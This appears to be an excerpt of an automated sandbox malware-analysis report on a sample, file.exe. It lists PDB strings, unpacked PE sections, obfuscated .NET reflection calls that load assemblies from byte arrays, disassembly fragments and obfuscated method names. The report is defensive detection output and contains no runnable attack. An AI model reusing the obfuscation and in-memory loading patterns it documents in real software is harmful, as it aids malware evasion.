Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SIsaiIITJVPvUAG.exe, 00000005.00000002.3271108355.000000000078E000.00000002.00000001.01000000.00000009.sdmp, SIsaiIITJVPvUAG.exe, 00000007.00000000.2655832138.000000000078E000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: wntdll.pdbUGP source: file.exe, 00000002.00000002.2588936794.0000000001070000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000002.3271902920.0000000003110000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000003.2590721651.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000002.3271902920.00000000032AE000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000003.2588637820.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000002.00000002.2588936794.0000000001070000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, unlodctr.exe, 00000006.00000002.3271902920.0000000003110000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000003.2590721651.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000002.3271902920.00000000032AE000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000003.2588637820.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: unlodctr.pdb source: file.exe, 00000002.00000002.2588802399.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000005.00000002.3271199728.0000000000958000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.b60000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.b60000.0.unpack
Source: 0.2.file.exe.302776c.3.raw.unpack, XG.cs .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 0.2.file.exe.7d70000.11.raw.unpack, XG.cs .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 0.2.file.exe.3016af4.6.raw.unpack, XG.cs .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 0.2.file.exe.4c466d0.8.raw.unpack, rKwf1snFHRc5cByU6r.cs .Net Code: c9Ls9Nj5I8 System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, rKwf1snFHRc5cByU6r.cs .Net Code: c9Ls9Nj5I8 System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.2f00000.1.raw.unpack, rKwf1snFHRc5cByU6r.cs .Net Code: c9Ls9Nj5I8 System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA6695 push dword ptr [ebp-45ED0376h]; iretd 0_2_02DA669B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041789D push es; retf 2_2_0041789E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040D0AF push esi; iretd 2_2_0040D0B0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040CA39 push ebp; ret 2_2_0040CA53
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00413B53 push esi; iretd 2_2_00413C4C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00413B93 push esi; iretd 2_2_00413C4C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041839C push ebp; iretd 2_2_0041839E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00413C54 push 203B2B75h; iretd 2_2_00413C6B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00403500 push eax; ret 2_2_00403502
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00405648 push esp; retf 2_2_0040564D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041878A push ds; iretd 2_2_0041878B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A09AD push ecx; mov dword ptr [esp], ecx 2_2_010A09B6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0311225F pushad ; ret 6_2_031127F9
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031127FA pushad ; ret 6_2_031127F9
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031409AD push ecx; mov dword ptr [esp], ecx 6_2_031409B6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0311283D push eax; iretd 6_2_03112858
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_00822145 push esp; retf 6_2_0082214A
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_00842160 push dword ptr [edi+36E8C72Ch]; retf 6_2_008421BD
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_00830741 push esi; iretd 6_2_00830749
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_00830751 push 203B2B75h; iretd 6_2_00830768
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_00834E99 push ebp; iretd 6_2_00834E9B
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_008390A3 push esp; retf 6_2_008390B2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_00839050 push esp; retf 6_2_008390B2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_00839050 pushfd ; retf 0DE4h 6_2_00839157
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0083B145 pushad ; retf 6_2_0083B14E
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_00835287 push ds; iretd 6_2_00835288
Source: file.exe Static PE information: section name: .text entropy: 7.898790141360765
Source: 0.2.file.exe.4c466d0.8.raw.unpack, pey3jwNuK1xJybQwoj8.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'b9u6K25A0U', 'i256MWuWhn', 'ViR6CHbkll', 'jve6q0PvfZ', 'tQJ6PO8W5X', 'GnU6FBClUo', 'n6C6xfxXMu'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, rKwf1snFHRc5cByU6r.cs High entropy of concatenated method names: 'EJUWBdB02Y', 'tbZWZeDhQd', 'wOlWbSpbRW', 'RiBWLXmyjL', 'HZrWlNDdnY', 'NhGW3ZrlJl', 'nuZWTGyhOD', 'EDdW5rhIbP', 'QjcWNS0nny', 'NcFWOve4Lh'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, YaJ5I2c4geKSsNFup3.cs High entropy of concatenated method names: 'cqK3B2cJkX', 'Gg53b0hh2w', 'KYK3lIsNoX', 'lsb3T9kpNP', 'XAw35cchZa', 'gfVlPKTpUX', 'CXylFvhNfk', 'lualxDy72u', 'bwPlD4UXKD', 'hmrlIleYB0'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, qJdyhDlMgvZxbGqxmX.cs High entropy of concatenated method names: 'SUETZ14o8V', 'b9cTL86GO2', 'G7oT3oTrap', 'FSh3Sgi2pn', 'cZQ3z1KKNL', 'it9Tc6XFwR', 'BiLTjhNuKQ', 'I9ZTuAjLJD', 'pvRTWedoyA', 'pr0TsuImR5'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, Yecs5JrXcOYWv09lFS.cs High entropy of concatenated method names: 'h80gaXBrNk', 'sy2gm6ihss', 'Hkeg0c2UwS', 'SLrgiMXajv', 'UFNgwYGeJF', 'htNg8RAv3u', 'aeyg7VQs4C', 'PeWgfTehKW', 'dM1gHVesnm', 'RCKgyi3LG8'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, PdWmiIgTb1m8cOof48.cs High entropy of concatenated method names: 'NnNYOoAdqN', 'dPmYApfkrh', 'ToString', 'NK7YZ7uXsx', 'aD5Yb0kYAa', 'GDbYLuGSNs', 'QyEYlcwECl', 'DsDY3m1fsx', 'mhLYTnEaay', 'yEJY5ta3x9'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, A7jHikbDKsr1EJC689.cs High entropy of concatenated method names: 'sDj2HAfJWq', 'lcr2hU2hRn', 'JmU2KUy8Tq', 've32Mi8Gu6', 'dTX2iYqdA0', 'EwA2X5eZWe', 'mIQ2wNE0nh', 'Ut2289xcrl', 'JlZ2EcsZZ7', 'uAA27iWx3r'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, RwI7lMzc0u39nGRRWE.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TdMkg1iyLp', 'wlJk2NQQDX', 'J9JkoXaHpm', 'KLvkYLgZLi', 'k1jkVQ5XhF', 'aoRkkeYdQ9', 'pNok6wy6H5'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, ljECXCqthIZahbq4SS.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ftLuI3ZKMp', 'Fs1uSWR5J0', 'HCLuzcf0lo', 'lIAWc1tS2G', 'J2aWjly8LA', 'XjsWunJkjt', 'gpGWWebdET', 'XwpI5bs4E31nl8mDYQI'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, XSWxs9NKF09WW8Q3ama.cs High entropy of concatenated method names: 'WBrknIniAy', 'Ykjkd9fhQm', 'tubk9YopRK', 'TI8keTtTJx', 'LaPkr2aIAx', 'C4sk1KCf9q', 'rWWkGcX4Wv', 'uAnkanjgZy', 'GrnkmkSW8X', 'btmktwk6wT'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, dq9wSSD6id57lPFj7V.cs High entropy of concatenated method names: 'ToString', 'EimoyJcAat', 'jdkoiRINlI', 'bvHoXsUUEc', 'pUYowRtstM', 'lfBo89dNSC', 'HMToEeXD4J', 'vUOo7T8BP0', 'BmyofZl1Ms', 'tYlopdx1NX'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, vFuLmq7r4eQgfT7kNE.cs High entropy of concatenated method names: 'dQUlr8FkhP', 'vvXlGLe27J', 'G8mLXKk3RH', 'NdKLwmmN70', 'qs3L8R9UgI', 'MbmLEOeu6g', 'qIPL7aZ2VP', 'iuQLfvN82h', 'bk1LpVUo50', 'dvMLHTvHUZ'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, I7tC3U2oYHipl2xD0a.cs High entropy of concatenated method names: 'WlxkjenaqD', 'fMhkWUApkV', 'yDaks2Sj61', 'yeLkZhEcJv', 'NhckbGS3vn', 'yLNkl3gcj0', 'CnWk3SEpbE', 'OcEVxJtLsv', 'PC8VDsaJ7s', 'QQ4VIACpou'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, cgf1Bx512PpTujvsru.cs High entropy of concatenated method names: 'trqbKqHUJj', 'vKjbMvSOSK', 's8kbCrdd7q', 'a4Dbq5PJpp', 'vEVbP05CrM', 'D0mbFPg4lq', 'jwPbxXDtXc', 'thhbDuODn0', 'hiUbIJb7v5', 'BbebSYtNab'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, i30Nc3yrPLNEHN2inT.cs High entropy of concatenated method names: 'D10TnuSh7t', 'gfeTdZu4qr', 'uujT9xkeQC', 'ASYTeWJHMj', 'ze1TrGpgPw', 'xS7T1Ovj5v', 'pCnTGL4Jku', 'rEoTa7a2OE', 'KdkTmZ5MPH', 'VHgTth7SyI'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, p4k52yteBlRAQud3mQ.cs High entropy of concatenated method names: 'Ry0LeornrQ', 'jmuL1stsM7', 'wy9LadClhC', 'LeILmhMUWl', 'X7sL2bdJwq', 'EwULoP9WoR', 'xYaLYpnKMY', 'CLULVW3pcy', 'aHMLkDMC8r', 'rCrL6aD7Cu'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, BeXM5KmXPmhrIR04xK.cs High entropy of concatenated method names: 'VypVZS6xSs', 'EbJVbTWRqd', 'BVWVL90vvs', 'PY1VlMcx62', 'JVVV3u0UPJ', 'JBhVToK9XI', 'UJUV5Z70u7', 'jOPVNw4cQ0', 'eDwVO40n2y', 'HeDVAYK9A2'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, XgoyoPZt7joAwfstZu.cs High entropy of concatenated method names: 'BX89LgZB7', 'D3qeRj17O', 'zuP1dgZCK', 'aX2GUwUwU', 'irqmhopHZ', 'avpt2uHrs', 'xwMnjxUjVSFftCmKmV', 'zunhvUw6AcRwHgkRM9', 'f9wVl4GIn', 'Fcn6iCrGI'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, II5e620l6UArMFUbwB.cs High entropy of concatenated method names: 'G3AYDcAb5V', 'WtsYS9LJcY', 'INDVcqVgQl', 'KBwVjCFkF1', 'lXbYyTyqnm', 'adGYhcs0Dq', 'XncYJnugpP', 'cjNYKZ1STC', 'OCHYMXhba3', 'oUlYCtmZ7j'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, Wwv9pRIVU2pDOGA83U.cs High entropy of concatenated method names: 'GksjTGYEsi', 'S0kj5fnZnZ', 'UWqjOjjHfi', 'hmujAfWKcf', 'H5lj2lV7yQ', 'CUpjoDWMBp', 'HTywOlokl0iBJBw3Ba', 'QEBivazDOUN5bnlukg', 'wgLjjTwomT', 'xgTjW9J0xS'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, bXMrWYW0lkNZduuFmi.cs High entropy of concatenated method names: 'gu2V0kWP6O', 'wxgVi20qOE', 'wafVX7CCQh', 'HxOVwEBquR', 'Q9pVKUTuU2', 'FPvV8JgGYk', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, xc65kWLEQ8WPsjOLQc.cs High entropy of concatenated method names: 'Dispose', 'RtdjIE2Nuv', 'sh5uiJKnFi', 'UIoQQnpZgC', 'r7qjSi7io5', 'uUljzXYMcp', 'ProcessDialogKey', 'Cb4ucvBaSm', 'HRLujpqTWW', 'eKauuP8bq6'
Source: 0.2.file.exe.302776c.3.raw.unpack, XG.cs High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.file.exe.7d70000.11.raw.unpack, XG.cs High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.file.exe.3016af4.6.raw.unpack, XG.cs High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, pey3jwNuK1xJybQwoj8.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'b9u6K25A0U', 'i256MWuWhn', 'ViR6CHbkll', 'jve6q0PvfZ', 'tQJ6PO8W5X', 'GnU6FBClUo', 'n6C6xfxXMu'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, rKwf1snFHRc5cByU6r.cs High entropy of concatenated method names: 'EJUWBdB02Y', 'tbZWZeDhQd', 'wOlWbSpbRW', 'RiBWLXmyjL', 'HZrWlNDdnY', 'NhGW3ZrlJl', 'nuZWTGyhOD', 'EDdW5rhIbP', 'QjcWNS0nny', 'NcFWOve4Lh'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, YaJ5I2c4geKSsNFup3.cs High entropy of concatenated method names: 'cqK3B2cJkX', 'Gg53b0hh2w', 'KYK3lIsNoX', 'lsb3T9kpNP', 'XAw35cchZa', 'gfVlPKTpUX', 'CXylFvhNfk', 'lualxDy72u', 'bwPlD4UXKD', 'hmrlIleYB0'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, qJdyhDlMgvZxbGqxmX.cs High entropy of concatenated method names: 'SUETZ14o8V', 'b9cTL86GO2', 'G7oT3oTrap', 'FSh3Sgi2pn', 'cZQ3z1KKNL', 'it9Tc6XFwR', 'BiLTjhNuKQ', 'I9ZTuAjLJD', 'pvRTWedoyA', 'pr0TsuImR5'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, Yecs5JrXcOYWv09lFS.cs High entropy of concatenated method names: 'h80gaXBrNk', 'sy2gm6ihss', 'Hkeg0c2UwS', 'SLrgiMXajv', 'UFNgwYGeJF', 'htNg8RAv3u', 'aeyg7VQs4C', 'PeWgfTehKW', 'dM1gHVesnm', 'RCKgyi3LG8'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, PdWmiIgTb1m8cOof48.cs High entropy of concatenated method names: 'NnNYOoAdqN', 'dPmYApfkrh', 'ToString', 'NK7YZ7uXsx', 'aD5Yb0kYAa', 'GDbYLuGSNs', 'QyEYlcwECl', 'DsDY3m1fsx', 'mhLYTnEaay', 'yEJY5ta3x9'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, A7jHikbDKsr1EJC689.cs High entropy of concatenated method names: 'sDj2HAfJWq', 'lcr2hU2hRn', 'JmU2KUy8Tq', 've32Mi8Gu6', 'dTX2iYqdA0', 'EwA2X5eZWe', 'mIQ2wNE0nh', 'Ut2289xcrl', 'JlZ2EcsZZ7', 'uAA27iWx3r'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, RwI7lMzc0u39nGRRWE.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TdMkg1iyLp', 'wlJk2NQQDX', 'J9JkoXaHpm', 'KLvkYLgZLi', 'k1jkVQ5XhF', 'aoRkkeYdQ9', 'pNok6wy6H5'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, ljECXCqthIZahbq4SS.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ftLuI3ZKMp', 'Fs1uSWR5J0', 'HCLuzcf0lo', 'lIAWc1tS2G', 'J2aWjly8LA', 'XjsWunJkjt', 'gpGWWebdET', 'XwpI5bs4E31nl8mDYQI'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, XSWxs9NKF09WW8Q3ama.cs High entropy of concatenated method names: 'WBrknIniAy', 'Ykjkd9fhQm', 'tubk9YopRK', 'TI8keTtTJx', 'LaPkr2aIAx', 'C4sk1KCf9q', 'rWWkGcX4Wv', 'uAnkanjgZy', 'GrnkmkSW8X', 'btmktwk6wT'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, dq9wSSD6id57lPFj7V.cs High entropy of concatenated method names: 'ToString', 'EimoyJcAat', 'jdkoiRINlI', 'bvHoXsUUEc', 'pUYowRtstM', 'lfBo89dNSC', 'HMToEeXD4J', 'vUOo7T8BP0', 'BmyofZl1Ms', 'tYlopdx1NX'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, vFuLmq7r4eQgfT7kNE.cs High entropy of concatenated method names: 'dQUlr8FkhP', 'vvXlGLe27J', 'G8mLXKk3RH', 'NdKLwmmN70', 'qs3L8R9UgI', 'MbmLEOeu6g', 'qIPL7aZ2VP', 'iuQLfvN82h', 'bk1LpVUo50', 'dvMLHTvHUZ'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, I7tC3U2oYHipl2xD0a.cs High entropy of concatenated method names: 'WlxkjenaqD', 'fMhkWUApkV', 'yDaks2Sj61', 'yeLkZhEcJv', 'NhckbGS3vn', 'yLNkl3gcj0', 'CnWk3SEpbE', 'OcEVxJtLsv', 'PC8VDsaJ7s', 'QQ4VIACpou'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, cgf1Bx512PpTujvsru.cs High entropy of concatenated method names: 'trqbKqHUJj', 'vKjbMvSOSK', 's8kbCrdd7q', 'a4Dbq5PJpp', 'vEVbP05CrM', 'D0mbFPg4lq', 'jwPbxXDtXc', 'thhbDuODn0', 'hiUbIJb7v5', 'BbebSYtNab'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, i30Nc3yrPLNEHN2inT.cs High entropy of concatenated method names: 'D10TnuSh7t', 'gfeTdZu4qr', 'uujT9xkeQC', 'ASYTeWJHMj', 'ze1TrGpgPw', 'xS7T1Ovj5v', 'pCnTGL4Jku', 'rEoTa7a2OE', 'KdkTmZ5MPH', 'VHgTth7SyI'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, p4k52yteBlRAQud3mQ.cs High entropy of concatenated method names: 'Ry0LeornrQ', 'jmuL1stsM7', 'wy9LadClhC', 'LeILmhMUWl', 'X7sL2bdJwq', 'EwULoP9WoR', 'xYaLYpnKMY', 'CLULVW3pcy', 'aHMLkDMC8r', 'rCrL6aD7Cu'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, BeXM5KmXPmhrIR04xK.cs High entropy of concatenated method names: 'VypVZS6xSs', 'EbJVbTWRqd', 'BVWVL90vvs', 'PY1VlMcx62', 'JVVV3u0UPJ', 'JBhVToK9XI', 'UJUV5Z70u7', 'jOPVNw4cQ0', 'eDwVO40n2y', 'HeDVAYK9A2'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, XgoyoPZt7joAwfstZu.cs High entropy of concatenated method names: 'BX89LgZB7', 'D3qeRj17O', 'zuP1dgZCK', 'aX2GUwUwU', 'irqmhopHZ', 'avpt2uHrs', 'xwMnjxUjVSFftCmKmV', 'zunhvUw6AcRwHgkRM9', 'f9wVl4GIn', 'Fcn6iCrGI'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, II5e620l6UArMFUbwB.cs High entropy of concatenated method names: 'G3AYDcAb5V', 'WtsYS9LJcY', 'INDVcqVgQl', 'KBwVjCFkF1', 'lXbYyTyqnm', 'adGYhcs0Dq', 'XncYJnugpP', 'cjNYKZ1STC', 'OCHYMXhba3', 'oUlYCtmZ7j'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, Wwv9pRIVU2pDOGA83U.cs High entropy of concatenated method names: 'GksjTGYEsi', 'S0kj5fnZnZ', 'UWqjOjjHfi', 'hmujAfWKcf', 'H5lj2lV7yQ', 'CUpjoDWMBp', 'HTywOlokl0iBJBw3Ba', 'QEBivazDOUN5bnlukg', 'wgLjjTwomT', 'xgTjW9J0xS'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, bXMrWYW0lkNZduuFmi.cs High entropy of concatenated method names: 'gu2V0kWP6O', 'wxgVi20qOE', 'wafVX7CCQh', 'HxOVwEBquR', 'Q9pVKUTuU2', 'FPvV8JgGYk', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, xc65kWLEQ8WPsjOLQc.cs High entropy of concatenated method names: 'Dispose', 'RtdjIE2Nuv', 'sh5uiJKnFi', 'UIoQQnpZgC', 'r7qjSi7io5', 'uUljzXYMcp', 'ProcessDialogKey', 'Cb4ucvBaSm', 'HRLujpqTWW', 'eKauuP8bq6'
Source: 0.2.file.exe.2f00000.1.raw.unpack, pey3jwNuK1xJybQwoj8.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'b9u6K25A0U', 'i256MWuWhn', 'ViR6CHbkll', 'jve6q0PvfZ', 'tQJ6PO8W5X', 'GnU6FBClUo', 'n6C6xfxXMu'
Source: 0.2.file.exe.2f00000.1.raw.unpack, rKwf1snFHRc5cByU6r.cs High entropy of concatenated method names: 'EJUWBdB02Y', 'tbZWZeDhQd', 'wOlWbSpbRW', 'RiBWLXmyjL', 'HZrWlNDdnY', 'NhGW3ZrlJl', 'nuZWTGyhOD', 'EDdW5rhIbP', 'QjcWNS0nny', 'NcFWOve4Lh'
Source: 0.2.file.exe.2f00000.1.raw.unpack, YaJ5I2c4geKSsNFup3.cs High entropy of concatenated method names: 'cqK3B2cJkX', 'Gg53b0hh2w', 'KYK3lIsNoX', 'lsb3T9kpNP', 'XAw35cchZa', 'gfVlPKTpUX', 'CXylFvhNfk', 'lualxDy72u', 'bwPlD4UXKD', 'hmrlIleYB0'
Source: 0.2.file.exe.2f00000.1.raw.unpack, qJdyhDlMgvZxbGqxmX.cs High entropy of concatenated method names: 'SUETZ14o8V', 'b9cTL86GO2', 'G7oT3oTrap', 'FSh3Sgi2pn', 'cZQ3z1KKNL', 'it9Tc6XFwR', 'BiLTjhNuKQ', 'I9ZTuAjLJD', 'pvRTWedoyA', 'pr0TsuImR5'
Source: 0.2.file.exe.2f00000.1.raw.unpack, Yecs5JrXcOYWv09lFS.cs High entropy of concatenated method names: 'h80gaXBrNk', 'sy2gm6ihss', 'Hkeg0c2UwS', 'SLrgiMXajv', 'UFNgwYGeJF', 'htNg8RAv3u', 'aeyg7VQs4C', 'PeWgfTehKW', 'dM1gHVesnm', 'RCKgyi3LG8'
Source: 0.2.file.exe.2f00000.1.raw.unpack, PdWmiIgTb1m8cOof48.cs High entropy of concatenated method names: 'NnNYOoAdqN', 'dPmYApfkrh', 'ToString', 'NK7YZ7uXsx', 'aD5Yb0kYAa', 'GDbYLuGSNs', 'QyEYlcwECl', 'DsDY3m1fsx', 'mhLYTnEaay', 'yEJY5ta3x9'
Source: 0.2.file.exe.2f00000.1.raw.unpack, A7jHikbDKsr1EJC689.cs High entropy of concatenated method names: 'sDj2HAfJWq', 'lcr2hU2hRn', 'JmU2KUy8Tq', 've32Mi8Gu6', 'dTX2iYqdA0', 'EwA2X5eZWe', 'mIQ2wNE0nh', 'Ut2289xcrl', 'JlZ2EcsZZ7', 'uAA27iWx3r'
Source: 0.2.file.exe.2f00000.1.raw.unpack, RwI7lMzc0u39nGRRWE.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TdMkg1iyLp', 'wlJk2NQQDX', 'J9JkoXaHpm', 'KLvkYLgZLi', 'k1jkVQ5XhF', 'aoRkkeYdQ9', 'pNok6wy6H5'
Source: 0.2.file.exe.2f00000.1.raw.unpack, ljECXCqthIZahbq4SS.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ftLuI3ZKMp', 'Fs1uSWR5J0', 'HCLuzcf0lo', 'lIAWc1tS2G', 'J2aWjly8LA', 'XjsWunJkjt', 'gpGWWebdET', 'XwpI5bs4E31nl8mDYQI'
Source: 0.2.file.exe.2f00000.1.raw.unpack, XSWxs9NKF09WW8Q3ama.cs High entropy of concatenated method names: 'WBrknIniAy', 'Ykjkd9fhQm', 'tubk9YopRK', 'TI8keTtTJx', 'LaPkr2aIAx', 'C4sk1KCf9q', 'rWWkGcX4Wv', 'uAnkanjgZy', 'GrnkmkSW8X', 'btmktwk6wT'
Source: 0.2.file.exe.2f00000.1.raw.unpack, dq9wSSD6id57lPFj7V.cs High entropy of concatenated method names: 'ToString', 'EimoyJcAat', 'jdkoiRINlI', 'bvHoXsUUEc', 'pUYowRtstM', 'lfBo89dNSC', 'HMToEeXD4J', 'vUOo7T8BP0', 'BmyofZl1Ms', 'tYlopdx1NX'
Source: 0.2.file.exe.2f00000.1.raw.unpack, vFuLmq7r4eQgfT7kNE.cs High entropy of concatenated method names: 'dQUlr8FkhP', 'vvXlGLe27J', 'G8mLXKk3RH', 'NdKLwmmN70', 'qs3L8R9UgI', 'MbmLEOeu6g', 'qIPL7aZ2VP', 'iuQLfvN82h', 'bk1LpVUo50', 'dvMLHTvHUZ'
Source: 0.2.file.exe.2f00000.1.raw.unpack, I7tC3U2oYHipl2xD0a.cs High entropy of concatenated method names: 'WlxkjenaqD', 'fMhkWUApkV', 'yDaks2Sj61', 'yeLkZhEcJv', 'NhckbGS3vn', 'yLNkl3gcj0', 'CnWk3SEpbE', 'OcEVxJtLsv', 'PC8VDsaJ7s', 'QQ4VIACpou'
Source: 0.2.file.exe.2f00000.1.raw.unpack, cgf1Bx512PpTujvsru.cs High entropy of concatenated method names: 'trqbKqHUJj', 'vKjbMvSOSK', 's8kbCrdd7q', 'a4Dbq5PJpp', 'vEVbP05CrM', 'D0mbFPg4lq', 'jwPbxXDtXc', 'thhbDuODn0', 'hiUbIJb7v5', 'BbebSYtNab'
Source: 0.2.file.exe.2f00000.1.raw.unpack, i30Nc3yrPLNEHN2inT.cs High entropy of concatenated method names: 'D10TnuSh7t', 'gfeTdZu4qr', 'uujT9xkeQC', 'ASYTeWJHMj', 'ze1TrGpgPw', 'xS7T1Ovj5v', 'pCnTGL4Jku', 'rEoTa7a2OE', 'KdkTmZ5MPH', 'VHgTth7SyI'
Source: 0.2.file.exe.2f00000.1.raw.unpack, p4k52yteBlRAQud3mQ.cs High entropy of concatenated method names: 'Ry0LeornrQ', 'jmuL1stsM7', 'wy9LadClhC', 'LeILmhMUWl', 'X7sL2bdJwq', 'EwULoP9WoR', 'xYaLYpnKMY', 'CLULVW3pcy', 'aHMLkDMC8r', 'rCrL6aD7Cu'
Source: 0.2.file.exe.2f00000.1.raw.unpack, BeXM5KmXPmhrIR04xK.cs High entropy of concatenated method names: 'VypVZS6xSs', 'EbJVbTWRqd', 'BVWVL90vvs', 'PY1VlMcx62', 'JVVV3u0UPJ', 'JBhVToK9XI', 'UJUV5Z70u7', 'jOPVNw4cQ0', 'eDwVO40n2y', 'HeDVAYK9A2'
